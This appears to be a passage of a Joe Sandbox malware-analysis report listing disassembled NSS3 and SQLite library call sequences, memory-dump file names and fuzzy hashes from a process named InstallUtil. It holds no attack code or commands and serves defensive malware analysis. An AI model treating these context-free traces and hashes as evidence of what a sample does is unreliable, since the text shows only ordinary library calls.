                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F29E2
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6F2A31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$Enter$Leave
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2801635615-0
                                                                                                                  • Opcode ID: f098974fc287e597ca47c7975ba379b7c62757a454dcf65b8799cc4c57cf2486
                                                                                                                  • Instruction ID: 3cb51fcf1435f272705547c4532edee6bd5363836c7449457e0bf5120aee4481
                                                                                                                  • Opcode Fuzzy Hash: f098974fc287e597ca47c7975ba379b7c62757a454dcf65b8799cc4c57cf2486
                                                                                                                  • Instruction Fuzzy Hash: 3FF1CF31B015548BDB249FA1E99DA6E3732BF87319B18013DD8265BB11CB399843CFDA
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7548A2
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C7548C4
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6C7548D8
                                                                                                                  • memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6C7548FB
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6C754908
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C754947
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C75496C
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C754988
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C878DAC,?), ref: 6C7549DE
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7549FD
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C754ACB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4201528089-0
                                                                                                                  • Opcode ID: 0d242a257e5b7208cd65f3f6790537df835985e2aa87e2a4502797a57bbe8087
                                                                                                                  • Instruction ID: 577d9ccca1a5a08d9c0b4144c86786a1b82deb4f2ed5990fd65226fb30e067c0
                                                                                                                  • Opcode Fuzzy Hash: 0d242a257e5b7208cd65f3f6790537df835985e2aa87e2a4502797a57bbe8087
                                                                                                                  • Instruction Fuzzy Hash: E55104B5A003018FEB608F66DE4979B36E4BF40308F544538E919ABB81EF71D438DB56
                                                                                                                  APIs
                                                                                                                  • sqlite3_initialize.NSS3 ref: 6C822D9F
                                                                                                                    • Part of subcall function 6C6DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C73F9C9,?,6C73F4DA,6C73F9C9,?,?,6C70369A), ref: 6C6DCA7A
                                                                                                                    • Part of subcall function 6C6DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6DCB26
                                                                                                                  • sqlite3_exec.NSS3(?,?,6C822F70,?,?), ref: 6C822DF9
                                                                                                                  • sqlite3_free.NSS3(00000000), ref: 6C822E2C
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C822E3A
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C822E52
                                                                                                                  • sqlite3_mprintf.NSS3(6C88AAF9,?), ref: 6C822E62
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C822E70
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C822E89
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C822EBB
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C822ECB
                                                                                                                  • sqlite3_free.NSS3(00000000), ref: 6C822F3E
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C822F4C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1957633107-0
                                                                                                                  • Opcode ID: 3b61d56f22ec6d07ef953760f5363da99a01095a7826525c514a7c37cc51d999
                                                                                                                  • Instruction ID: cea3ff171f6216ae1b909fb8f4ae72f638b4868a4b253f1cf2e0cfc5ef9b63d6
                                                                                                                  • Opcode Fuzzy Hash: 3b61d56f22ec6d07ef953760f5363da99a01095a7826525c514a7c37cc51d999
                                                                                                                  • Instruction Fuzzy Hash: 5061B1B5E102098BEB20CF68D988BDEB7B1EF49358F150824DC15A7701E739E895CBE5
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4C97
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CB0
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CC9
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4D11
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4D2A
                                                                                                                  • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4D4A
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4D57
                                                                                                                  • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4D97
                                                                                                                  • PR_Lock.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4DBA
                                                                                                                  • PR_WaitCondVar.NSS3 ref: 6C6D4DD4
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4DE6
                                                                                                                  • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4DEF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3388019835-0
                                                                                                                  • Opcode ID: 6867ff3df351ffaac944ff9975d72bc199dbc13d6f830525ba684a6e1fe426e1
                                                                                                                  • Instruction ID: f77785e154da7464491711df56f551460bc0cf33058de8c3927a0948e24261fb
                                                                                                                  • Opcode Fuzzy Hash: 6867ff3df351ffaac944ff9975d72bc199dbc13d6f830525ba684a6e1fe426e1
                                                                                                                  • Instruction Fuzzy Hash: 95418EB1A08616CFCB20AF78D1885697BF4BF06318F064679D8889B701E730EC85CBD9
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C774E90
                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 6C774EA9
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C774EC6
                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 6C774EDF
                                                                                                                  • PL_HashTableLookup.NSS3 ref: 6C774EF8
                                                                                                                  • PR_Unlock.NSS3 ref: 6C774F05
                                                                                                                  • PR_Now.NSS3 ref: 6C774F13
                                                                                                                  • PR_Unlock.NSS3 ref: 6C774F3A
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                                  • String ID: bUwl$bUwl
                                                                                                                  • API String ID: 326028414-885062143
                                                                                                                  • Opcode ID: 21ffccb88345f0491cf8c5c59f81e51fa01725be1889b9a670f681fc47dc6398
                                                                                                                  • Instruction ID: 02c3b82d377686158ff6a76f55c655c63369fb0a8d4b14aca3f006e0a2349197
                                                                                                                  • Opcode Fuzzy Hash: 21ffccb88345f0491cf8c5c59f81e51fa01725be1889b9a670f681fc47dc6398
                                                                                                                  • Instruction Fuzzy Hash: 96416DB4A006099FCB10DF78C18486ABBF0FF49358B058569DC598B711EB30E855CFE1
                                                                                                                  APIs
                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C79DE64), ref: 6C79ED0C
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C79ED22
                                                                                                                    • Part of subcall function 6C7AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8818D0,?), ref: 6C7AB095
                                                                                                                  • PL_FreeArenaPool.NSS3(?), ref: 6C79ED4A
                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C79ED6B
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C79ED38
                                                                                                                    • Part of subcall function 6C6D4C70: TlsGetValue.KERNEL32(?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4C97
                                                                                                                    • Part of subcall function 6C6D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CB0
                                                                                                                    • Part of subcall function 6C6D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CC9
                                                                                                                  • SECOID_FindOID_Util.NSS3(?), ref: 6C79ED52
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C79ED83
                                                                                                                  • PL_FreeArenaPool.NSS3(?), ref: 6C79ED95
                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C79ED9D
                                                                                                                    • Part of subcall function 6C7B64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C7B127C,00000000,00000000,00000000), ref: 6C7B650E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                  • String ID: security
                                                                                                                  • API String ID: 3323615905-3315324353
                                                                                                                  • Opcode ID: 3629cedafe0437a9cad001248ef9a9b2419179e5a5e8f6f958992058986b8f1f
                                                                                                                  • Instruction ID: 921e03b29c28ea457efb766e01181e2afc945d89bd9eb9ba148a44abc3c8f14e
                                                                                                                  • Opcode Fuzzy Hash: 3629cedafe0437a9cad001248ef9a9b2419179e5a5e8f6f958992058986b8f1f
                                                                                                                  • Instruction Fuzzy Hash: 77112B7690060867E6205A65BF8DBBB7278BF0260CF050934E81572F51FB35A70CD6D6
                                                                                                                  APIs
                                                                                                                  • PR_LogPrint.NSS3(Aborting,?,6C742357), ref: 6C860EB8
                                                                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C742357), ref: 6C860EC0
                                                                                                                  • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C860EE6
                                                                                                                    • Part of subcall function 6C8609D0: PR_Now.NSS3 ref: 6C860A22
                                                                                                                    • Part of subcall function 6C8609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C860A35
                                                                                                                    • Part of subcall function 6C8609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C860A66
                                                                                                                    • Part of subcall function 6C8609D0: PR_GetCurrentThread.NSS3 ref: 6C860A70
                                                                                                                    • Part of subcall function 6C8609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C860A9D
                                                                                                                    • Part of subcall function 6C8609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C860AC8
                                                                                                                    • Part of subcall function 6C8609D0: PR_vsmprintf.NSS3(?,?), ref: 6C860AE8
                                                                                                                    • Part of subcall function 6C8609D0: EnterCriticalSection.KERNEL32(?), ref: 6C860B19
                                                                                                                    • Part of subcall function 6C8609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C860B48
                                                                                                                    • Part of subcall function 6C8609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C860C76
                                                                                                                    • Part of subcall function 6C8609D0: PR_LogFlush.NSS3 ref: 6C860C7E
                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C860EFA
                                                                                                                    • Part of subcall function 6C74AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C74AF0E
                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F16
                                                                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F1C
                                                                                                                  • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F25
                                                                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F2B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                  • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                  • API String ID: 3905088656-1374795319
                                                                                                                  • Opcode ID: 0ea5e142a80f1d58383776134ef304111b30ad396db941266b7a59994fbfaa1c
                                                                                                                  • Instruction ID: a99df995426ee61271b2378a8e18b7ccb04cce7d59d7a4d3bdfe32cf099fb503
                                                                                                                  • Opcode Fuzzy Hash: 0ea5e142a80f1d58383776134ef304111b30ad396db941266b7a59994fbfaa1c
                                                                                                                  • Instruction Fuzzy Hash: AAF0AFB59001187BEB203BA5AC4AC9F3E2DDF82269F004834FD0956A03DB36E914D6F6
                                                                                                                  APIs
                                                                                                                  • PORT_NewArena_Util.NSS3(00000400), ref: 6C7C4DCB
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C7C4DE1
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C7C4DFF
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7C4E59
                                                                                                                    • Part of subcall function 6C7AFAB0: free.MOZGLUE(?,-00000001,?,?,6C74F673,00000000,00000000), ref: 6C7AFAC7
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C88300C,00000000), ref: 6C7C4EB8
                                                                                                                  • SECOID_FindOID_Util.NSS3(?), ref: 6C7C4EFF
                                                                                                                  • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C7C4F56
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7C521A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1025791883-0
                                                                                                                  • Opcode ID: 6003689a2d3889306dc834e08d24bfb1328f0fe7070a83dbf29e795ef5d5ab29
                                                                                                                  • Instruction ID: 8271ae4fe7edb0f86856d87baf8ac31d7607f1893480601fa613cf45cb3a5420
                                                                                                                  • Opcode Fuzzy Hash: 6003689a2d3889306dc834e08d24bfb1328f0fe7070a83dbf29e795ef5d5ab29
                                                                                                                  • Instruction Fuzzy Hash: D7F18C71F0020A8FDB04CF54E9447AEB7B2BF44358F258129E915AB781E776E981CB92
                                                                                                                  APIs
                                                                                                                  • PR_NewLock.NSS3(00000001,00000000,6C8A0148,?,6C766FEC), ref: 6C75502A
                                                                                                                  • PR_NewLock.NSS3(00000001,00000000,6C8A0148,?,6C766FEC), ref: 6C755034
                                                                                                                  • PL_NewHashTable.NSS3(00000000,6C7AFE80,6C7AFD30,6C7FC350,00000000,00000000,00000001,00000000,6C8A0148,?,6C766FEC), ref: 6C755055
                                                                                                                  • PL_NewHashTable.NSS3(00000000,6C7AFE80,6C7AFD30,6C7FC350,00000000,00000000,?,00000001,00000000,6C8A0148,?,6C766FEC), ref: 6C75506D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HashLockTable
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3862423791-0
                                                                                                                  • Opcode ID: 95074a9c5ab00e64810a02fbaee8389413fed2b9c724e369759e2dec69f4a2b7
                                                                                                                  • Instruction ID: 9b5cb1fea06fa76f12b728bef2e82a5a434532ce854fc8a9ae0c7e93eb67b94c
                                                                                                                  • Opcode Fuzzy Hash: 95074a9c5ab00e64810a02fbaee8389413fed2b9c724e369759e2dec69f4a2b7
                                                                                                                  • Instruction Fuzzy Hash: 8831F5B1B052209BDF208A659A4CB4B3BBCFB1336CF414535E90D93640EB79A415CBE5
                                                                                                                  APIs
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6F2F3D
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C6F2FB9
                                                                                                                  • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C6F3005
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C6F30EE
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6F3131
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6F3178
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
